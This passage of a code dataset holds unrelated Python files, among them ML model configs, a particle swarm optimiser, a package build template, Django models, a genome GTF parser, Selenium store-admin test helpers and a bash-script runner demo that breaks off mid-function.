encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_large():\n config = {\n \"embed_dim\": 192,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (6, 12, 24, 48),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_small():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_base():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.patch_size,\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_tiny():\n config = {\n \"depths\": (1, 1, 10),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_small(**kwargs):\n config = {\n \"depths\": (2, 2, 20),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n","repo_name":"SmilingWolf/JAX-CV","sub_path":"Models/SimMIM.py","file_name":"SimMIM.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16589553675","text":"\"\"\"\nImporting necessary libraries.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nClass to represent a function to be minimized.\n\"\"\"\nclass function:\n def func(x):\n return((x[1][0]-x[0][0])**4 + 12*x[0][0]*x[1][0] - x[0][0] + x[1][0] - 3)\n\n\"\"\"\nFOllowing class represnts a particle in population.\n\"\"\"\nclass particle(function):\n \"\"\"\n Following function initializes a particle's parameters.\n \"\"\"\n def __init__(self):\n self.x = np.random.rand(2,1)\n self.v = np.random.rand(2,1)\n self.p = self.x\n self.x_arr = []\n self.x_arr.append(self.x)\n self.level_set = []\n self.level_set.append(function.func(self.x))\n \nclass PSO(function):\n \"\"\"\n Following function initializes the swarm based on provided parameters.\n \"\"\"\n def __init__(self,epochs,d,w,c1,c2):\n self.swarm = []\n self.best = []\n self.worst = []\n self.average = []\n for i in range(d):\n par = particle()\n self.swarm.append(par)\n self.d = d\n self.w = w\n self.c1 = c1\n self.c2 = c2\n self.epochs = epochs\n self.g = None\n for i in range(d):\n if(i == 0):\n self.g = self.swarm[0].x\n elif(function.func(self.g)>function.func(self.swarm[i].x)):\n self.g = self.swarm[i].x\n \n \"\"\"\n Following function generates a new swarm for each iteration and essentially minimizes the function.\n \"\"\"\n def minimize(self):\n for i in range(self.epochs):\n for j in range(self.d):\n r = np.random.uniform(0.01,1,(2,1))\n s = np.subtract(np.ones((2,1)),r)\n self.swarm[j].v = np.add(np.add(np.multiply(self.w,self.swarm[j].v) , np.multiply(self.c1,np.multiply(r,np.subtract(self.swarm[j].p,self.swarm[j].x)))),np.multiply(self.c2,np.multiply(s,np.subtract(self.g,self.swarm[j].x))))\n self.swarm[j].x = self.swarm[j].x + self.swarm[j].v\n self.swarm[j].x_arr.append(self.swarm[j].x)\n self.swarm[j].level_set.append(function.func(self.swarm[j].x))\n if(function.func(self.swarm[j].x) < function.func(self.swarm[j].p)):\n self.swarm[j].p = self.swarm[j].x\n worst_curr = -999999\n avg_curr = 0\n best_curr = 999999\n for j in range(self.d):\n if(function.func(self.swarm[j].x)worst_curr):\n worst_curr = function.func(self.swarm[j].x)\n avg_curr = avg_curr + function.func(self.swarm[j].x) \n if(function.func(self.swarm[j].x) < function.func(self.g)):\n self.g = self.swarm[j].x\n avg_curr = avg_curr/(self.d)\n self.best.append(best_curr)\n self.average.append(avg_curr)\n self.worst.append(worst_curr)\n print(\"minimum value : \",function.func(self.g),\"minimizer point:\",self.g)\n \n \"\"\"\n Following function is used to generate a list of function values from given list x2 and x1. \n \"\"\"\n def fx_contour(self,x1,x2):\n return np.power(x2-x1,4)+(12*x1*x2)-x1+x2-3\n \n \"\"\"\n Following function is used plot a contour plot and the plot of best, average and worst function values for each iteration.\n \"\"\"\n def plot(self):\n X = np.linspace(-1,1,50)\n Y = np.linspace(-1,1,50)\n X,Y = np.meshgrid(X,Y)\n Z = self.fx_contour(X,Y)\n plt.contour(X,Y,Z,colors='black')\n for j in range(self.d):\n x1 = []\n x2 = []\n self.swarm[0].x_arr = np.array(self.swarm[0].x_arr)\n for i in range(self.epochs + 1):\n x1.append(self.swarm[j].x_arr[i][0][0])\n x2.append(self.swarm[j].x_arr[i][1][0])\n plt.plot(x1,x2,color='blue')\n plt.scatter(x1,x2,color='red')\n plt.show()\n X = []\n for i in range(len(self.best)):\n X.append(i+1)\n plt.plot(X,self.best,color='green')\n plt.scatter(X,self.best,color='green')\n plt.plot(X,self.average,color='blue')\n plt.scatter(X,self.average,color='blue')\n plt.plot(X,self.worst,color='red')\n plt.scatter(X,self.worst,color='red')\n plt.ylabel(\"Function value\")\n plt.xlabel(\"Iteration\")\n plt.title(\"Best, average and worst function value at each iteration\")\n plt.show()\n\n\"\"\"\nFollowing piece of code initializes a PSO object, calls minimize function and plots final graphs.\n\"\"\"\nnum_of_particles = 14\nnum_of_iterations = 20\nparticle_best_weight = 1.8\nglobal_best_weight = 1.8\nparticle_previous_influence_weight = 0.8\npso = PSO(num_of_iterations,num_of_particles,particle_previous_influence_weight,particle_best_weight,global_best_weight)\npso.minimize()\npso.plot()","repo_name":"Shahil98/Optimization-Algorithms","sub_path":"PSO/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"947566822","text":"pkgname = \"waypipe\"\npkgver = \"0.8.6\"\npkgrel = 0\nbuild_style = \"meson\"\nconfigure_args = [\n \"-Dwith_dmabuf=enabled\",\n \"-Dwith_systemtap=false\",\n \"-Dwith_vaapi=enabled\",\n \"-Dwith_video=enabled\",\n \"-Dwith_zstd=enabled\",\n \"-Db_ndebug=true\",\n]\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"scdoc\",\n \"wayland-progs\",\n]\nmakedepends = [\n \"ffmpeg-devel\",\n \"libdrm-devel\",\n \"libva-devel\",\n \"zstd-devel\",\n \"mesa-devel\",\n \"wayland-devel\",\n \"wayland-protocols\",\n]\npkgdesc = \"Proxy for wayland clients\"\nmaintainer = \"psykose \"\nlicense = \"MIT\"\nurl = \"https://gitlab.freedesktop.org/mstoeckl/waypipe\"\nsource = f\"https://gitlab.freedesktop.org/mstoeckl/waypipe/-/archive/v{pkgver}/waypipe-v{pkgver}.tar.bz2\"\nsha256 = \"da40de2e02d60c2c34d549e791a9019c1ddf9d79f42bfad0c6cb74f3f6af9b16\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_install(self):\n self.install_license(\"COPYING\")\n","repo_name":"chimera-linux/cports","sub_path":"contrib/waypipe/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"36"}
+{"seq_id":"74143297703","text":"def coolString(inputString):\n\n def isLowercase(symbol):\n if 'a' <= symbol <= 'z':\n return True\n return False\n\n def isUppercase(symbol):\n if 'A' <= symbol <= 'Z':\n return True\n return False\n\n firstIsLowercase = isLowercase(inputString[0])\n firstIsUppercase = isUppercase(inputString[0])\n\n if not (firstIsLowercase or firstIsUppercase):\n return False\n\n for i in range(1, len(inputString)):\n if i % 2 != 0:\n if (isLowercase(inputString[i]) == firstIsLowercase or\n isUppercase(inputString[i]) == firstIsUppercase):\n return False\n else:\n if (isLowercase(inputString[i]) != firstIsLowercase or\n isUppercase(inputString[i]) != firstIsUppercase):\n return False\n","repo_name":"jahirulislammolla/CodeFights","sub_path":"Fights/coolString.py","file_name":"coolString.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"6228768502","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n# Create your models here.\n\n\n\n# ? not sure wether to have user on workouts or workouts on user?\n# ! calculating speed in serializers\n# ? graph relationships to workouts. many to one? how would model show \n# ? fields to have on graph model?\n# * have levels associated with graph for exp?\n\n\nclass MuscleTraining(models.Model):\n name = models.CharField(max_length=50)\n muscles_worked = models.CharField(max_length=100)\n weight = models.IntegerField()\n duration = models.IntegerField(null=True)\n sets = models.IntegerField()\n reps = models.IntegerField()\n speed = models.IntegerField(null=True)\n user = models.ForeignKey(User, related_name='muscle_trainings', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.name}'\n\nclass Cardio(models.Model):\n type = models.CharField(max_length=50)\n duration = models.IntegerField()\n distance = models.IntegerField()\n speed = models.FloatField(null=True)\n user = models.ForeignKey(User, related_name='cardios', on_delete=models.CASCADE)\n def __str__(self):\n return f'{self.type}'\n\n\n","repo_name":"tombannister01/Fitness-Tracker-App","sub_path":"workouts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"21588445168","text":"#Blinks LED on pin 13 - Adafruit Edge Badge\n#No other files required\n\nimport time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\n\nled = DigitalInOut(board.D13)\nled.direction = Direction.OUTPUT\n\nwhile True:\n led.value = True\n time.sleep(1)\n led.value = False\n time.sleep(1)\n","repo_name":"JeremySCook/Edge-Badge","sub_path":"blink-led.py","file_name":"blink-led.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16108409610","text":"\n# coding: utf-8\n\n# In[1]:\n\n#!/usr/bin/env python\n\n\"\"\"new_gtf_genome_wide_parser.py: New gtf parses much faster and more effecient.\"\"\"\n\n__authos__ = \"Israa Alqassem\"\n__copyright__ = \"Copyright 2017, McSplicer\"\n\n\nimport csv\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n\n\ndef get_all_genes_dict(gtf_file, tx_anno=False):\n\n gene_dict = {}\n ss_anno = defaultdict(list)\n\n with open(gtf_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n for line in reader:\n if line[2] == 'subexon':\n start_site = int(line[3])\n end_site = int(line[4])\n strand_dir = line[6]\n\n gene_id = ''\n chr_id = line[0]\n\n feature_list = line[8].split(';')\n for feature in feature_list:\n tag_val = feature.split()\n if len(tag_val) == 2:\n\n tag = tag_val[0]\n value = tag_val[1]\n\n if tag=='SpliceEnd':\n splice_end = value[1:2] # R, L, or B\n elif tag=='NodeId':\n subexon_id = int(value)\n elif tag=='transcript_id':\n trans_id = value[1:-1]\n elif tag == 'gene_id':\n gene_id = value[1:-1] #remove double qouts\n\n if gene_id != '':\n if gene_id not in gene_dict:\n gene_dict[gene_id] = []\n\n\n gene_dict[gene_id].append([subexon_id,strand_dir,splice_end,start_site,end_site,trans_id,chr_id])\n if tx_anno:\n ss_anno[start_site].append(trans_id)\n ss_anno[end_site].append(trans_id)\n\n return gene_dict,ss_anno\n\n\n\n\ndef create_location_dicts(start_sites, end_sites, strand_dir):\n \"\"\" This func expects sorted start_sites and end_sites based on strand direction\n Returns 3 dicts:\n loc_index_dict -> Key: location, val: index\n start_sites_dict -> key: start location, index (helps to determine s1, s2, ...)\n end_sites_dict -> key: end location, index (helps to determine e1, e2, ...)\n \"\"\"\n\n loc_index_dict = {}\n start_sites_dict = {}\n end_sites_dict = {}\n\n location_list = [] # List of all start and end locations\n location_list.extend(start_sites)\n location_list.extend(end_sites)\n\n if strand_dir == '+':\n location_list.sort()\n else:\n location_list.sort(reverse=True)\n\n index = 0\n #print 'index','location'\n for location in location_list:\n #if location not in loc_index_dict:\n #print index, location\n loc_index_dict[location] = index\n index+=1\n\n index = 0\n for location in start_sites:\n start_sites_dict[location] = index\n index+=1\n\n index = 0\n for location in end_sites:\n end_sites_dict[location] = index\n index+=1\n\n\n return loc_index_dict, start_sites_dict, end_sites_dict\n\n\ndef get_gene_data(gene_id,gene_datalist):\n\n #for gene_id in gene_dict.keys():\n\n subexon_ids_dict = {}\n start_sites = []\n end_sites = []\n\n #print '>>>>>',gene_id\n for row in gene_datalist:\n subexon_id = row[0]\n strand_dir = row[1]\n splice_end = row[2]\n start_site = row[3]\n end_site = row[4]\n trans_id = row[5]\n\n\n \"\"\"\n Forward strand (+):\n potential start sites -> Left of L\n Left of B\n potential end sites -> Right of R\n Right of B\n\n s_____s____ e_____e\n |__L__|__B__|__R__|\n\n\n Backward strand (+):\n potential start site -> right of L\n right of B\n potential end site -> Left of R\n Left of B\n\n e_____e_____s_____s\n |__R__|__B__|__L__|\n\n \"\"\"\n\n if strand_dir == '+': # Forward strand\n subexon_ids_dict[subexon_id] = [start_site,end_site]\n\n if splice_end=='R':\n end_sites.append(end_site)\n elif splice_end=='L':\n start_sites.append(start_site)\n\n elif splice_end=='B':\n start_sites.append(start_site)\n end_sites.append(end_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n elif strand_dir == '-': # Reverse strand\n subexon_ids_dict[subexon_id] = [end_site,start_site]\n\n if splice_end=='R':\n end_sites.append(start_site)\n elif splice_end=='L':\n start_sites.append(end_site)\n\n elif splice_end=='B':\n start_sites.append(end_site)\n end_sites.append(start_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n\n start_sites = list(np.unique(start_sites))\n end_sites = list(np.unique(end_sites))\n\n\n if strand_dir == '-':\n end_sites.sort(reverse=True)\n start_sites.sort(reverse=True)\n elif strand_dir == '+':\n end_sites.sort()\n start_sites.sort()\n\n\n loc_index_dict, start_sites_dict, end_sites_dict = create_location_dicts(start_sites,end_sites, strand_dir)\n\n\n\n return strand_dir,loc_index_dict, start_sites_dict, end_sites_dict, subexon_ids_dict\n\n#start_time = time.time()\n#print \"--- %s seconds ---\" % str('{0:0.2f}'.format(time.time() - start_time))\n","repo_name":"canzarlab/McSplicer","sub_path":"python_scripts/new_gtf_genome_wide_parser.py","file_name":"new_gtf_genome_wide_parser.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"28869998262","text":"class Platoon(pycbf2.NESystem):\n def __init__(self, length, t_safety, v_goal):\n super(Platoon, self).__init__()\n\n for i in range(length):\n vehicle = Link(\n parent=self,\n mass=1,\n center_of_mass=[0, 0, 0],\n inertia_tensor=np.eye(3),\n index=i,\n axis=[1, 0, 0],\n link_type=LinkType.prismatic,\n rotation_local=np.eye(3),\n position=[0, 0, 0],\n )\n\n t, x, xdot = self.cbf_vars()\n\n class Controller(cbf.ControlFunc):\n def __init__(self):\n self.cbf = 1\n for i in range(length - 1):\n self.cbf *= (x[i + 1] - x[i]) - t_safety * xdot[i]\n self.t = 0\n\n def input_matrix(self, x, xdot):\n return np.eye(length)\n\n def uref(self, x, xdot):\n return v_goal - xdot\n\n self.controller = Controller()","repo_name":"danieljpietz/MSThesis","sub_path":"Code Examples/Platoon.py","file_name":"Platoon.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"24214557733","text":"from lib.ui_lib import *\n\nclass OrderClass(CommonMethods):\n\n def get_order_number(self,browser):\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\")\n browser_success_msg = element.text\n order_number = browser_success_msg[7:10]\n assert order_number != ''\n return order_number\n\n def search_order(self,browser,orderID):\n self.wait_until_element_present('keyword-filter', 'ID')\n e = browser.find_element_by_id('keyword-filter')\n e.send_keys(orderID)\n try:\n browser.find_element_by_xpath('//span[@class=\"responsive-hide\"]').click()\n except NoSuchElementException:\n browser.find_element_by_css_selector('.action-divider .filter-button').click()\n except WebDriverException:\n pass\n\n def get_order_status(self,browser, url, Order_Id):\n browser.get(urlparse.urljoin(url, '/admin/index.php?ToDo=viewOrders'))\n element = self.wait_until_element_present('//input[@id=\"keyword-filter\"]', \"XPATH\")\n element.clear()\n element.send_keys(Order_Id)\n browser.find_element_by_css_selector('.filter .btn-secondary').click()\n self.wait_until_element_present('status_' + Order_Id, 'ID')\n return browser.find_element_by_id('status_' + Order_Id).get_attribute('value')\n\n def refund_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open Refund modal\n element = self.wait_until_element_present('Refund', 'LINK')\n element.click()\n # Refund transaction\n element = self.wait_until_element_present('//label[@for=\"refundType_full\"]', 'XPATH')\n element.click()\n browser.find_element_by_id('refund-save').click()\n\n def capture_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Capture Funds', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def void_transaction(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Void Transaction', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def delete_order(self,browser):\n\n browser.find_element_by_xpath('//label[@for = \"order0\"]').click()\n self.select_dropdown_value(browser, 'OrderActionSelect', 'Archive Selected')\n browser.find_element_by_id('action-confirm').click()\n try:\n alert = browser.switch_to_alert()\n alert.accept()\n except WebDriverException:\n browser.execute_script(\"window.confirm = function(){return true;}\");\n browser.find_element_by_id('action-confirm').click()\n #Verify Order delete\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\").text\n assert \"The selected orders have been deleted successfully.\" in element\n\n def goto_view_orders(self,browser):\n self.wait_until_element_present('Orders', 'LINK').click()\n self.wait_until_element_present('View Orders', 'LINK').click()\n\n def cp_add_order_item(self,browser,name):\n #Add an Item\n element = self.wait_until_element_present('quote-item-search', \"ID\")\n element.click()\n element.send_keys(name)\n self.wait_until_element_present('//div[@class = \"recordContent undefined\"]', 'XPATH')\n browser.execute_script(\"$('#quote-item-search').trigger('keyup')\")\n browser.execute_script(\"$('.recordContent:eq(0)').trigger('click')\")\n self.wait_until_element_present('//span[@class = \"swatchColour swatchColour_1\"]', \"XPATH\")\n browser.find_element_by_xpath('//span[@class = \"swatchColour swatchColour_1\"]').click()\n browser.find_element_by_id('dialog-options-submit').click()\n self.wait_until_element_present('//th[@class = \"image\"]', \"XPATH\")\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present('//label[@for = \"shipping-single\"]', 'XPATH')\n\n def cp_select_shipping_payment(self,browser, paymentname):\n browser.find_element_by_xpath('//label[@for = \"shipping-single\"]').click()\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present(\"//select[@id='paymentMethod']/option[text()='\"+paymentname+\"']\", \"XPATH\").click()\n self.find_element_by_css_selector('.Field_custom_name input')\n self.execute_script(\"$('.Field_custom_name input').val('\"+paymentname+\"');\")\n browser.find_element_by_xpath('//button[@class = \"btn btn-primary orderMachineSaveButton orderSaveButton\"]').click()\n\n def create_order_controlpanel(self,browser, email, password, firstname, lastname,company,phone,street_add1,street_add2,city,country,state,postcode, invalid_email,invalid_pwd):\n element = self.wait_until_element_present('Orders', \"LINK\")\n element.click()\n browser.find_element_by_link_text('Add an Order').click()\n element = self.wait_until_element_present('//label[@for = \"check-new-customer\"]', \"XPATH\")\n element.click()\n #Validation for Invalid Email\n browser.find_element_by_id('FormField_1').send_keys(invalid_email)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"Please enter a valid email address such as joe@example.com\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_1').clear()\n browser.find_element_by_id('FormField_1').send_keys(email)\n #Validation for Invalid Password\n browser.find_element_by_id('FormField_2').send_keys(invalid_pwd)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"The password and confirmed password do not match.\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_2').clear()\n browser.find_element_by_id('FormField_2').send_keys(password)\n browser.find_element_by_id('FormField_3').send_keys(password)\n self.select_dropdown_value(browser, 'accountCustomerGroup', '-- Do not assign to any group --')\n browser.find_element_by_id('FormField_4').send_keys(firstname)\n browser.find_element_by_id('FormField_5').send_keys(lastname)\n browser.find_element_by_id('FormField_6').send_keys(company)\n browser.find_element_by_id('FormField_7').send_keys(phone)\n browser.find_element_by_id('FormField_8').send_keys(street_add1)\n browser.find_element_by_id('FormField_9').send_keys(street_add2)\n browser.find_element_by_id('FormField_10').send_keys(city)\n self.select_dropdown_value(browser, 'FormField_11', country)\n self.select_dropdown_value(browser, 'FormField_12', state)\n self.clear_field(browser,'FormField_13')\n browser.find_element_by_id('FormField_13').send_keys(postcode)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n #Add an Item\n self.cp_add_order_item(browser,'[Sample] Anna, bright single bangles')\n # Select Shipping address and Payment method\n self.cp_select_shipping_payment(browser, 'Manual Payment')\n\n # Verify and Assert the success message\n browser_success_msg = self.wait_until_element_present('.alert-success', 'CSS_SELECTOR').text\n order_success_msg=\"Order #%s has been created successfully.\" % browser_success_msg[7:10]\n orderID = self.get_order_number(browser)\n\n assert order_success_msg in browser_success_msg\n return orderID\n","repo_name":"testing-sravan/tests-scripts-worked","sub_path":"Regression_suite_bigc/lib/order_class.py","file_name":"order_class.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"75139715881","text":"from parse import compile\r\n\r\n\r\nclass StepTable:\r\n \"\"\"Step table parser utility class\"\"\"\r\n KEY_TEXT = 'key'\r\n EMPTY_TEXT = ''\r\n VALUE_TEXT = 'value'\r\n NESTED_KEY_TEXT = 'nested_key'\r\n EMPTY_DOUBLE_QUOTES = '\"\"'\r\n NEW_LINE_CHARACTER = '\\n'\r\n LESS_THAN_CHARACTER = '<'\r\n GREATER_THAN_CHARACTER = '>'\r\n key_value_schema = compile('|{key:^w}|{value:^}|')\r\n nested_key_value_schema = compile('|{key:^w}|{nested_key:^}|{value:^}|')\r\n\r\n @staticmethod\r\n def parse_step_table(step_table: str):\r\n \"\"\"Parse static step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n Key value mapping with empty value will be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n if line == StepTable.EMPTY_TEXT:\r\n break\r\n result = StepTable.key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_nested_key_step_table(step_table: str):\r\n \"\"\"Parse static nested step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n If empty value, simple or nested key value be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n result = StepTable.nested_key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse nested step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n elif result.named[StepTable.NESTED_KEY_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n else:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT):\r\n {result.named.get(StepTable.NESTED_KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)}\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_step_table_example_value(request, table_dict):\r\n \"\"\"Parse step table example value\"\"\"\r\n return {key: StepTable.get_value(request, value) for key, value in table_dict.items()}\r\n\r\n @staticmethod\r\n def get_value(request, argument):\r\n \"\"\"Get fixture value from BDD examples\"\"\"\r\n if argument[0] == StepTable.LESS_THAN_CHARACTER and argument[-1] == StepTable.GREATER_THAN_CHARACTER:\r\n value = request.getfixturevalue(argument[1:-1])\r\n return None if value == StepTable.EMPTY_TEXT else value\r\n return None if argument == StepTable.EMPTY_DOUBLE_QUOTES else argument\r\n","repo_name":"kr87nikhil/python-bdd","sub_path":"utility/parse_steps.py","file_name":"parse_steps.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36982475426","text":"\"\"\"Script to test execution of bash scripts, gathering\n the results, combining them and saving them.\n\n\t @author 'Pat Barton'\t \n\"\"\"\n\n\n\n\"\"\"This demo is simple, but shows all the key steps required to integrate\n existing bash scripts with you python codes.\n\n Exactly what the bash scripts do is not important so we'll \n spin up some trivial ones. We'll just make some up. For\n\t demo purposes all will do the same thing - return the names\n\t of files (ls/dir command) - from their directories.\n\n We'll create different directories for each of three bash scripts\n and populate the directories with files named so we know where\n\t they camre from.\n\n\tAll this happens in setup_scratch_dirs() - not that all this functionality\n\t is isolated from the rest of the code. That way it'll be easy to substitute\n\t \"real\" bash scripts from your own directories. Note the use of \n\t tempfile.mkdtemp() - this writes a scratch directory somewhere safe. Note\n\t also that we're exercising good manners by cleaning up the mess using\n\t shutil.rmtree.\n\n\t=======\n\tThe bash files will go out into the world and do something. All this functionality\n\t is handled in run_scripts(). Note, again, the isolated functionality - this makes things\n\t easy to maintain. We run the scripts and capture their output with the \n\t subprocess.check_output() method.\n\n\t===\n\tAt the end of the day we want to do something with the output. That's all handled in\n\t the process_output() function. Naturally, you'll want to \"roll your own\" here, but you \n\t know where to put it.\n\n\t===\n\tThe global namespace of the module is uncluttered. The bit at the top wrangles the \n\t imports and makes sure we remember the original directory. The bit at the bottom\n\t cleans things up and ensures that we leave the working directory right where we found it.\n\"\"\"\n\nimport tempfile\nimport os\nimport shutil\nimport subprocess\n\nNUM_SCRIPTS = 3\n\n#make a temp dir and switch into it.\norig_dir = os.getcwd() #remember original dir\ntemp_dir = tempfile.mkdtemp() #returns name of new dir\nos.chdir(temp_dir) #switch to temp dir\n\ndef setup_scratch_dirs():\n \"\"\"This routine makes subdirectories in scratch folder. Each\n gets populated with a few empty files and its own bash script.\n So it'll look like:\n scratch\\\n subdir0\\\n \t subdir0_file0\n \t\t subdir0_file1\n \t\t subdir0_file2\n \t\t script0.sh\n \tThe script file just contains the command 'ls' and will list the\n \tfiles in its subdir (makes output easy to check)\n\n \tA list of the script files is returned.\n \"\"\"\t\t \n scrip_paths=[]\n for s in range(NUM_SCRIPTS):\n subname = \"subdir\" + str(s)\n sub = os.mkdir(subname) #make sudirs named 'subdir0', etc.\n os.chdir(subname) #switch to subdir\n for f in range(5): \n filename = \"subdir\" + str(s) + \"_file\" + str(f)\n open(filename, 'w').close()\n\n #create a script file and a file handler\n scriptname = 'script' + str(s) + \".sh\"\n scrip_paths.append(os.path.join(os.getcwd(), scriptname))\n with open(scriptname, 'w') as script:\n script.write(\"#! /bin/bash\\n\")\n script.write(\"ls\\n\") #lists contents of the director\n\n os.chmod(scriptname, 0o777) #let anyone do anything with the script\n\n os.chdir('..') #switch to scratch dir\n\n return scrip_paths\n\ndef run_scripts(scripts):\n \"\"\"Expects an iterable object (list, tuple, etc.) containing\n fully-specified path to script file. Runs each script, \n captures the output, and does something with the output.\n\n The subprocess module has tons of options. You can read\n all about them here:\n\n https://docs.python.org/3/library/subprocess.html\n\n Output is stored in a list, one element for each script,\n and returned.\n\n \"\"\"\n output_list=[]\n for index, s in enumerate(scripts):\n #split path name from script name\n sdir, sname = os.path.split(s) \n #run the script using its dir as the cwd, capture output\n os.chdir(sdir)\n output = 